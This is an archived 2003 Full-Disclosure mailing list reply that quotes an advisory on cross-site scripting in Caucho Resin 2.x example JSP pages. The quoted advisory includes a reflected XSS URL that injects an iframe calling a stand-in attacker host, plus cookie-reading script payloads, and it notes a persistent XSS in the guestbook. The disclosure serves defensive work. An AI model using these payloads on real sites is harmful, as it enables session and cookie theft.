[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <000c01c39676$5d489110$3200000a@pluto>
From: jkuperus at planet.nl (jelmer)
Subject: Caucho Resin 2.x - Cross Site Scripting
Donny,
These are in the example applications, which any sane admin should disable
right away, much like caucho-status
These are basic procedures in setting up a server.
--jelmer
----- Original Message -----
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
> -----------------------------------------------------------------
> - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
> -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vunerability(s):
> ----------------
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> -----------------------
> "Resin? is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VUNERABILITY / EXPLOIT
> ======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
> or
>
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
> IPT>
>
> the above is only an example, all cookie and session
> stealing Cross Site Scripting was possible.
>
>
> guestbook.jsp allows persistant XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
>
>
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
>
> Vendor Fix:
> -----------
> Versions 3.x dont have the examples included
>
>
>
> Vendor Contact:
> ---------------
> bugs@...cho.com
> Concurrent with this advisory
>
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@...labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists